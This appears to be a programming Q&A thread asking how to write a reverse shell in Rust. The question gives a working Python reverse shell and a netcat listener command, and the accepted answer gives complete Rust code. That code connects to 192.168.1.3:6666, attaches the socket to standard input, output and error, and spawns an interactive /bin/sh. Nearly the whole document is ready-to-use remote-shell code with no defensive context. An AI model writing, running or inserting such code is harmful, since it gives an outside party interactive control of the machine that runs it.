# What is the Rust equivalent of a reverse shell script written in Python?

Tags: python, sockets, rust, subprocess, reverse-shell

A reverse shell script in Python normally looks something like this:

```py
import socket, subprocess, os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((\"192.168.1.3\", 6666));

os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);

p=subprocess.call([\"/bin/sh\", \"-i\"]);
```

I am trying to duplicate this process with Rust:

```
let mut stream = std::net::TcpStream::connect("192.168.1.3:6666").unwrap();
```

I only got as far as getting a TCP connection to my host machine, listening with netcat (`nc -l -p 6666`). If I understand correctly, I need to redirect standard input, output, and error, through the socket and then somehow "call" `/bin/sh`.

How do I write this reverse shell script in Rust?

Answer (score 6, accepted):

The equivalent of your Python reverse shell in Rust would be:

```
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

fn main() {
    let s = TcpStream::connect("192.168.1.3:6666").unwrap();
    let fd = s.as_raw_fd();
    Command::new("/bin/sh")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn()
        .unwrap()
        .wait()
        .unwrap();
}
```